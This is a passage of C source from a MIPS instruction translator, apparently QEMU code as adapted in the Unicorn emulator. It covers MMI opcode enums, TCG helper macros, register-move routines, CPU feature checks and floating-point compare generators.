MMI_OPC_CLASS_MMI2, MMI_OPC_2_PMULTH = (0x1C << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PDIVBW = (0x1D << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PEXEW = (0x1E << 6) | MMI_OPC_CLASS_MMI2, MMI_OPC_2_PROT3W = (0x1F << 6) | MMI_OPC_CLASS_MMI2, }; /* * MMI instructions with opcode field = MMI and bits 5..0 = MMI3: * * 31 26 10 6 5 0 * +--------+----------------------+--------+--------+ * | MMI | |function| MMI3 | * +--------+----------------------+--------+--------+ * * function bits 7..6 * bits | 0 | 1 | 2 | 3 * 10..8 | 00 | 01 | 10 | 11 * -------+-------+-------+-------+------- * 0 000 |PMADDUW| * | * | PSRAVW * 1 001 | * | * | * | * * 2 010 | PMTHI | PMTLO | PINTEH| * * 3 011 |PMULTUW| PDIVUW| PCPYUD| * * 4 100 | * | * | POR | PNOR * 5 101 | * | * | * | * * 6 110 | * | * | PEXCH | PCPYH * 7 111 | * | * | PEXCW | * */ #define MASK_MMI3(op) (MASK_OP_MAJOR(op) | ((op) & 0x7FF)) enum { MMI_OPC_3_PMADDUW = (0x00 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PSRAVW = (0x03 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PMTHI = (0x08 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PMTLO = (0x09 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PINTEH = (0x0A << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PMULTUW = (0x0C << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PDIVUW = (0x0D << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PCPYUD = (0x0E << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_POR = (0x12 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PNOR = (0x13 << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PEXCH = (0x1A << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PCPYH = (0x1B << 6) | MMI_OPC_CLASS_MMI3, MMI_OPC_3_PEXCW = (0x1E << 6) | MMI_OPC_CLASS_MMI3, }; #include "exec/gen-icount.h" #define gen_helper_0e0i(name, arg) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_0e1i(name, arg1, arg2) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_1e0i(name, ret, arg1) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg1); \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_1e1i(name, ret, arg1, arg2) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_0e2i(name, arg1, arg2, arg3) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_1e2i(name, ret, arg1, arg2, arg3) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) #define gen_helper_0e3i(name, arg1, arg2, arg3, arg4) do { \ TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg4); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, arg3, helper_tmp); \ tcg_temp_free_i32(tcg_ctx, helper_tmp); \ } while (0) typedef struct DisasContext { DisasContextBase base; target_ulong saved_pc; target_ulong page_start; uint32_t opcode; uint64_t insn_flags; int32_t CP0_Config1; int32_t CP0_Config2; int32_t CP0_Config3; int32_t CP0_Config5; /* Routine used to access memory */ int mem_idx; MemOp default_tcg_memop_mask; uint32_t hflags, saved_hflags; target_ulong btarget; bool ulri; int kscrexist; bool rxi; int ie; bool bi; bool bp; uint64_t PAMask; bool mvh; bool eva; bool sc; int CP0_LLAddr_shift; bool ps; bool vp; bool cmgcr; bool mrp; bool nan2008; bool abs2008; bool saar; bool mi; int gi; // Unicorn struct uc_struct *uc; } DisasContext; #define DISAS_STOP DISAS_TARGET_0 #define DISAS_EXIT DISAS_TARGET_1 static const char * const regnames[] = { "r0", "at", "v0", "v1", "a0", "a1", "a2", "a3", "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7", "t8", "t9", "k0", "k1", "gp", "sp", "s8", "ra", }; static const char * const regnames_HI[] = { "HI0", "HI1", "HI2", "HI3", }; static const char * const regnames_LO[] = { "LO0", "LO1", "LO2", "LO3", }; static const char * const msaregnames[] = { "w0.d0", "w0.d1", "w1.d0", "w1.d1", "w2.d0", "w2.d1", "w3.d0", "w3.d1", "w4.d0", "w4.d1", "w5.d0", "w5.d1", "w6.d0", "w6.d1", "w7.d0", "w7.d1", "w8.d0", "w8.d1", "w9.d0", "w9.d1", "w10.d0", "w10.d1", "w11.d0", "w11.d1", "w12.d0", "w12.d1", "w13.d0", "w13.d1", "w14.d0", "w14.d1", "w15.d0", "w15.d1", "w16.d0", "w16.d1", "w17.d0", "w17.d1", "w18.d0", "w18.d1", "w19.d0", "w19.d1", "w20.d0", "w20.d1", "w21.d0", "w21.d1", "w22.d0", "w22.d1", "w23.d0", "w23.d1", "w24.d0", "w24.d1", "w25.d0", "w25.d1", "w26.d0", "w26.d1", "w27.d0", "w27.d1", "w28.d0", "w28.d1", "w29.d0", "w29.d1", "w30.d0", "w30.d1", "w31.d0", "w31.d1", }; #if !defined(TARGET_MIPS64) static const char * const mxuregnames[] = { "XR1", "XR2", "XR3", "XR4", "XR5", "XR6", "XR7", "XR8", "XR9", "XR10", "XR11", "XR12", "XR13", "XR14", "XR15", "MXU_CR", }; #endif #define LOG_DISAS(...) \ do { \ if (MIPS_DEBUG_DISAS) { \ qemu_log_mask(CPU_LOG_TB_IN_ASM, ## __VA_ARGS__); \ } \ } while (0) #define MIPS_INVAL(op) \ do { \ if (MIPS_DEBUG_DISAS) { \ qemu_log_mask(CPU_LOG_TB_IN_ASM, \ TARGET_FMT_lx ": %08x Invalid %s %03x %03x %03x\n", \ ctx->base.pc_next, ctx->opcode, op, \ ctx->opcode >> 26, ctx->opcode & 0x3F, \ ((ctx->opcode >> 16) & 0x1F)); \ } \ } while (0) /* General purpose registers moves. */ static inline void gen_load_gpr(TCGContext *tcg_ctx, TCGv t, int reg) { if (reg == 0) { tcg_gen_movi_tl(tcg_ctx, t, 0); } else { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->cpu_gpr[reg]); } } static inline void gen_store_gpr(TCGContext *tcg_ctx, TCGv t, int reg) { if (reg != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], t); } } /* Moves to/from shadow registers. */ static inline void gen_load_srsgpr(TCGContext *tcg_ctx, int from, int to) { TCGv t0 = tcg_temp_new(tcg_ctx); if (from == 0) { tcg_gen_movi_tl(tcg_ctx, t0, 0); } else { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl)); tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf); tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32); tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2); tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr); tcg_gen_ld_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * from); tcg_temp_free_ptr(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, t2); } gen_store_gpr(tcg_ctx, t0, to); tcg_temp_free(tcg_ctx, t0); } static inline void gen_store_srsgpr(TCGContext *tcg_ctx, int from, int to) { if (to != 0) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx); gen_load_gpr(tcg_ctx, t0, from); tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl)); tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf); tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32); tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2); tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr); tcg_gen_st_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * to); tcg_temp_free_ptr(tcg_ctx, addr); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t0); } } #if !defined(TARGET_MIPS64) /* MXU General purpose registers moves. */ static inline void gen_load_mxu_gpr(TCGContext *tcg_ctx, TCGv t, unsigned int reg) { if (reg == 0) { tcg_gen_movi_tl(tcg_ctx, t, 0); } else if (reg <= 15) { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->mxu_gpr[reg - 1]); } } static inline void gen_store_mxu_gpr(TCGContext *tcg_ctx, TCGv t, unsigned int reg) { if (reg > 0 && reg <= 15) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->mxu_gpr[reg - 1], t); } } /* MXU control register moves. */ static inline void gen_load_mxu_cr(TCGContext *tcg_ctx, TCGv t) { tcg_gen_mov_tl(tcg_ctx, t, tcg_ctx->mxu_CR); } static inline void gen_store_mxu_cr(TCGContext *tcg_ctx, TCGv t) { /* TODO: Add handling of RW rules for MXU_CR. */ tcg_gen_mov_tl(tcg_ctx, tcg_ctx->mxu_CR, t); } #endif /* Tests */ static inline void gen_save_pc(TCGContext *tcg_ctx, target_ulong pc) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, pc); } static inline void save_cpu_state(DisasContext *ctx, int do_save_pc) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; LOG_DISAS("hflags %08x saved %08x\n", ctx->hflags, ctx->saved_hflags); if (do_save_pc && ctx->base.pc_next != ctx->saved_pc) { gen_save_pc(tcg_ctx, ctx->base.pc_next); ctx->saved_pc = ctx->base.pc_next; } if (ctx->hflags != ctx->saved_hflags) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags); ctx->saved_hflags = ctx->hflags; switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_BR: break; case MIPS_HFLAG_BC: case MIPS_HFLAG_BL: case MIPS_HFLAG_B: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->btarget, ctx->btarget); break; } } } static inline void restore_cpu_state(CPUMIPSState *env, DisasContext *ctx) { ctx->saved_hflags = ctx->hflags; switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_BR: break; case MIPS_HFLAG_BC: case MIPS_HFLAG_BL: case MIPS_HFLAG_B: ctx->btarget = env->btarget; break; } } static inline void generate_exception_err(DisasContext *ctx, int excp, int err) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 texcp = tcg_const_i32(tcg_ctx, excp); TCGv_i32 terr = tcg_const_i32(tcg_ctx, err); save_cpu_state(ctx, 1); gen_helper_raise_exception_err(tcg_ctx, tcg_ctx->cpu_env, texcp, terr); tcg_temp_free_i32(tcg_ctx, terr); tcg_temp_free_i32(tcg_ctx, texcp); ctx->base.is_jmp = DISAS_NORETURN; } static inline void generate_exception(DisasContext *ctx, int excp) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_0e0i(raise_exception, excp); } static inline void generate_exception_end(DisasContext *ctx, int excp) { generate_exception_err(ctx, excp, 0); } /* Floating point register moves. */ static void gen_load_fpr32(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_FRE) { generate_exception(ctx, EXCP_RI); } tcg_gen_extrl_i64_i32(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); } static void gen_store_fpr32(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t64; if (ctx->hflags & MIPS_HFLAG_FRE) { generate_exception(ctx, EXCP_RI); } t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t64, t); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 0, 32); tcg_temp_free_i64(tcg_ctx, t64); } static void gen_load_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { tcg_gen_extrh_i64_i32(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); } else { gen_load_fpr32(ctx, t, reg | 1); } } static void gen_store_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t64, t); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 32, 32); tcg_temp_free_i64(tcg_ctx, t64); } else { gen_store_fpr32(ctx, t, reg | 1); } } static void gen_load_fpr64(DisasContext *ctx, TCGv_i64 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { tcg_gen_mov_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); } else { tcg_gen_concat32_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg | 1]); } } static void gen_store_fpr64(DisasContext *ctx, TCGv_i64 t, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_F64) { tcg_gen_mov_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], t); } else { TCGv_i64 t0; tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg & ~1], t, 0, 32); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_shri_i64(tcg_ctx, t0, t, 32); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg | 1], tcg_ctx->fpu_f64[reg | 1], t0, 0, 32); tcg_temp_free_i64(tcg_ctx, t0); } } static inline int get_fp_bit(int cc) { if (cc) { return 24 + cc; } else { return 23; } } /* Addresses computation */ static inline void gen_op_addr_add(DisasContext *ctx, TCGv ret, TCGv arg0, TCGv arg1) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_add_tl(tcg_ctx, ret, arg0, arg1); #if defined(TARGET_MIPS64) if (ctx->hflags & MIPS_HFLAG_AWRAP) { tcg_gen_ext32s_i64(tcg_ctx, ret, ret); } #endif } static inline void gen_op_addr_addi(DisasContext *ctx, TCGv ret, TCGv base, target_long ofs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, ret, base, ofs); #if defined(TARGET_MIPS64) if (ctx->hflags & MIPS_HFLAG_AWRAP) { tcg_gen_ext32s_i64(tcg_ctx, ret, ret); } #endif } /* Addresses computation (translation time) */ static target_long addr_add(DisasContext *ctx, target_long base, target_long offset) { target_long sum = base + offset; #if defined(TARGET_MIPS64) if (ctx->hflags & MIPS_HFLAG_AWRAP) { sum = (int32_t)sum; } #endif return sum; } /* Sign-extract the low 32-bits to a target_long. */ static inline void gen_move_low32(TCGContext *tcg_ctx, TCGv ret, TCGv_i64 arg) { #if defined(TARGET_MIPS64) tcg_gen_ext32s_i64(tcg_ctx, ret, arg); #else tcg_gen_extrl_i64_i32(tcg_ctx, ret, arg); #endif } /* Sign-extract the high 32-bits to a target_long. */ static inline void gen_move_high32(TCGContext *tcg_ctx, TCGv ret, TCGv_i64 arg) { #if defined(TARGET_MIPS64) tcg_gen_sari_i64(tcg_ctx, ret, arg, 32); #else tcg_gen_extrh_i64_i32(tcg_ctx, ret, arg); #endif } static inline void check_cp0_enabled(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_CP0))) { generate_exception_err(ctx, EXCP_CpU, 0); } } static inline void check_cp1_enabled(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_FPU))) { generate_exception_err(ctx, EXCP_CpU, 1); } } /* * Verify that the processor is running with COP1X instructions enabled. * This is associated with the nabla symbol in the MIPS32 and MIPS64 * opcode tables. */ static inline void check_cop1x(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_COP1X))) { generate_exception_end(ctx, EXCP_RI); } } /* * Verify that the processor is running with 64-bit floating-point * operations enabled. */ static inline void check_cp1_64bitmode(DisasContext *ctx) { if (unlikely(~ctx->hflags & (MIPS_HFLAG_F64 | MIPS_HFLAG_COP1X))) { generate_exception_end(ctx, EXCP_RI); } } /* * Verify if floating point register is valid; an operation is not defined * if bit 0 of any register specification is set and the FR bit in the * Status register equals zero, since the register numbers specify an * even-odd pair of adjacent coprocessor general registers. When the FR bit * in the Status register equals one, both even and odd register numbers * are valid. This limitation exists only for 64 bit wide (d,l,ps) registers. * * Multiple 64 bit wide registers can be checked by calling * gen_op_cp1_registers(freg1 | freg2 | ... | fregN); */ static inline void check_cp1_registers(DisasContext *ctx, int regs) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_F64) && (regs & 1))) { generate_exception_end(ctx, EXCP_RI); } } /* * Verify that the processor is running with DSP instructions enabled. * This is enabled by CP0 Status register MX(24) bit. */ static inline void check_dsp(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP))) { if (ctx->insn_flags & ASE_DSP) { generate_exception_end(ctx, EXCP_DSPDIS); } else { generate_exception_end(ctx, EXCP_RI); } } } static inline void check_dsp_r2(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP_R2))) { if (ctx->insn_flags & ASE_DSP) { generate_exception_end(ctx, EXCP_DSPDIS); } else { generate_exception_end(ctx, EXCP_RI); } } } static inline void check_dsp_r3(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP_R3))) { if (ctx->insn_flags & ASE_DSP) { generate_exception_end(ctx, EXCP_DSPDIS); } else { generate_exception_end(ctx, EXCP_RI); } } } /* * This code generates a "reserved instruction" exception if the * CPU does not support the instruction set corresponding to flags. */ static inline void check_insn(DisasContext *ctx, uint64_t flags) { if (unlikely(!(ctx->insn_flags & flags))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * CPU has corresponding flag set which indicates that the instruction * has been removed. */ static inline void check_insn_opc_removed(DisasContext *ctx, uint64_t flags) { if (unlikely(ctx->insn_flags & flags)) { generate_exception_end(ctx, EXCP_RI); } } /* * The Linux kernel traps certain reserved instruction exceptions to * emulate the corresponding instructions. QEMU is the kernel in user * mode, so those traps are emulated by accepting the instructions. * * A reserved instruction exception is generated for flagged CPUs if * QEMU runs in system mode. */ static inline void check_insn_opc_user_only(DisasContext *ctx, uint64_t flags) { check_insn_opc_removed(ctx, flags); } /* * This code generates a "reserved instruction" exception if the * CPU does not support 64-bit paired-single (PS) floating point data type. */ static inline void check_ps(DisasContext *ctx) { if (unlikely(!ctx->ps)) { generate_exception(ctx, EXCP_RI); } check_cp1_64bitmode(ctx); } #ifdef TARGET_MIPS64 /* * This code generates a "reserved instruction" exception if 64-bit * instructions are not enabled. */ static inline void check_mips_64(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_64))) { generate_exception_end(ctx, EXCP_RI); } } #endif static inline void check_mvh(DisasContext *ctx) { if (unlikely(!ctx->mvh)) { generate_exception(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config5 XNP bit is set. */ static inline void check_xnp(DisasContext *ctx) { if (unlikely(ctx->CP0_Config5 & (1 << CP0C5_XNP))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config3 PW bit is NOT set. */ static inline void check_pw(DisasContext *ctx) { if (unlikely(!(ctx->CP0_Config3 & (1 << CP0C3_PW)))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config3 MT bit is NOT set. */ static inline void check_mt(DisasContext *ctx) { if (unlikely(!(ctx->CP0_Config3 & (1 << CP0C3_MT)))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "coprocessor unusable" exception if CP0 is not * available, and, if that is not the case, generates a "reserved instruction" * exception if the Config5 MT bit is NOT set. This is needed for availability * control of some of MT ASE instructions. */ static inline void check_cp0_mt(DisasContext *ctx) { if (unlikely(!(ctx->hflags & MIPS_HFLAG_CP0))) { generate_exception_err(ctx, EXCP_CpU, 0); } else { if (unlikely(!(ctx->CP0_Config3 & (1 << CP0C3_MT)))) { generate_exception_err(ctx, EXCP_RI, 0); } } } /* * This code generates a "reserved instruction" exception if the * Config5 NMS bit is set. */ static inline void check_nms(DisasContext *ctx) { if (unlikely(ctx->CP0_Config5 & (1 << CP0C5_NMS))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config5 NMS bit is set, and Config1 DL, Config1 IL, Config2 SL, * Config2 TL, and Config5 L2C are unset. */ static inline void check_nms_dl_il_sl_tl_l2c(DisasContext *ctx) { if (unlikely((ctx->CP0_Config5 & (1 << CP0C5_NMS)) && !(ctx->CP0_Config1 & (1 << CP0C1_DL)) && !(ctx->CP0_Config1 & (1 << CP0C1_IL)) && !(ctx->CP0_Config2 & (1 << CP0C2_SL)) && !(ctx->CP0_Config2 & (1 << CP0C2_TL)) && !(ctx->CP0_Config5 & (1 << CP0C5_L2C)))) { generate_exception_end(ctx, EXCP_RI); } } /* * This code generates a "reserved instruction" exception if the * Config5 EVA bit is NOT set. */ static inline void check_eva(DisasContext *ctx) { if (unlikely(!(ctx->CP0_Config5 & (1 << CP0C5_EVA)))) { generate_exception_end(ctx, EXCP_RI); } } /* * Define small wrappers for gen_load_fpr* so that we have a uniform * calling interface for 32 and 64-bit FPRs. No sense in changing * all callers for gen_load_fpr32 when we need the CTX parameter for * this one use. */ #define gen_ldcmp_fpr32(ctx, x, y) gen_load_fpr32(ctx, x, y) #define gen_ldcmp_fpr64(ctx, x, y) gen_load_fpr64(ctx, x, y) #define FOP_CONDS(type, abs, fmt, ifmt, bits) \ static inline void gen_cmp ## type ## _ ## fmt(DisasContext *ctx, int n, \ int ft, int fs, int cc) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i##bits fp0 = tcg_temp_new_i##bits(tcg_ctx); \ TCGv_i##bits fp1 = tcg_temp_new_i##bits(tcg_ctx); \ switch (ifmt) { \ case FMT_PS: \ check_ps(ctx); \ break; \ case FMT_D: \ if (abs) { \ check_cop1x(ctx); \ } \ check_cp1_registers(ctx, fs | ft); \ break; \ case FMT_S: \ if (abs) { \ check_cop1x(ctx); \ } \ break; \ } \ gen_ldcmp_fpr##bits(ctx, fp0, fs); \ gen_ldcmp_fpr##bits(ctx, fp1, ft); \ switch (n) { \ case 0: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _f, fp0, fp1, cc); \ break; \ case 1: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _un, fp0, fp1, cc); \ break; \ case 2: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _eq, fp0, fp1, cc); \ break; \ case 3: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ueq, fp0, fp1, cc); \ break; \ case 4: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _olt, fp0, fp1, cc); \ break; \ case 5: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ult, fp0, fp1, cc); \ break; \ case 6: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ole, fp0, fp1, cc); \ break; \ case 7: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ule, fp0, fp1, cc); \ break; \ case 8: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _sf, fp0, fp1, cc); \ break; \ case 9: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ngle, fp0, fp1, cc); \ break; \ case 10: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _seq, fp0, fp1, cc); \ break; \ case 11: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ngl, fp0, fp1, cc); \ break; \ case 12: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _lt, fp0, fp1, cc); \ break; \ case 13: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _nge, fp0, fp1, cc); \ break; \ case 14: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _le, fp0, fp1, cc); \ break; \ case 15: \ gen_helper_0e2i(cmp ## type ## _ ## fmt ## _ngt, fp0, fp1, cc); \ break; \ default: \ abort(); \ } \ tcg_temp_free_i##bits(tcg_ctx, fp0); \ tcg_temp_free_i##bits(tcg_ctx, fp1); \ } FOP_CONDS(, 0, d, FMT_D, 64) FOP_CONDS(abs, 1, d, FMT_D, 64) FOP_CONDS(, 0, s, FMT_S, 32) FOP_CONDS(abs, 1, s, FMT_S, 32) FOP_CONDS(, 0, ps, FMT_PS, 64) FOP_CONDS(abs, 1, ps, FMT_PS, 64) #undef FOP_CONDS #define FOP_CONDNS(fmt, ifmt, bits, STORE) \ static inline void gen_r6_cmp_ ## fmt(DisasContext *ctx, int n, \ int ft, int fs, int fd) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i ## bits fp0 = tcg_temp_new_i ## bits(tcg_ctx); \ TCGv_i ## bits fp1 = tcg_temp_new_i ## bits(tcg_ctx); \ if (ifmt == FMT_D) { \ check_cp1_registers(ctx, fs | ft | fd); \ } \ gen_ldcmp_fpr ## bits(ctx, fp0, fs); \ gen_ldcmp_fpr ## bits(ctx, fp1, ft); \ switch (n) { \ case 0: \ gen_helper_r6_cmp_ ## fmt ## _af(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 1: \ gen_helper_r6_cmp_ ## fmt ## _un(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 2: \ gen_helper_r6_cmp_ ## fmt ## _eq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 3: \ gen_helper_r6_cmp_ ## fmt ## _ueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 4: \ gen_helper_r6_cmp_ ## fmt ## _lt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 5: \ gen_helper_r6_cmp_ ## fmt ## _ult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 6: \ gen_helper_r6_cmp_ ## fmt ## _le(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 7: \ gen_helper_r6_cmp_ ## fmt ## _ule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 8: \ gen_helper_r6_cmp_ ## fmt ## _saf(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 9: \ gen_helper_r6_cmp_ ## fmt ## _sun(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 10: \ gen_helper_r6_cmp_ ## fmt ## _seq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 11: \ gen_helper_r6_cmp_ ## fmt ## _sueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 12: \ gen_helper_r6_cmp_ ## fmt ## _slt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 13: \ gen_helper_r6_cmp_ ## fmt ## _sult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 14: \ gen_helper_r6_cmp_ ## fmt ## _sle(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 15: \ gen_helper_r6_cmp_ ## fmt ## _sule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 17: \ gen_helper_r6_cmp_ ## fmt ## _or(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; \ case 18: \ gen_helper_r6_cmp_ ## fmt ## _une(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ break; 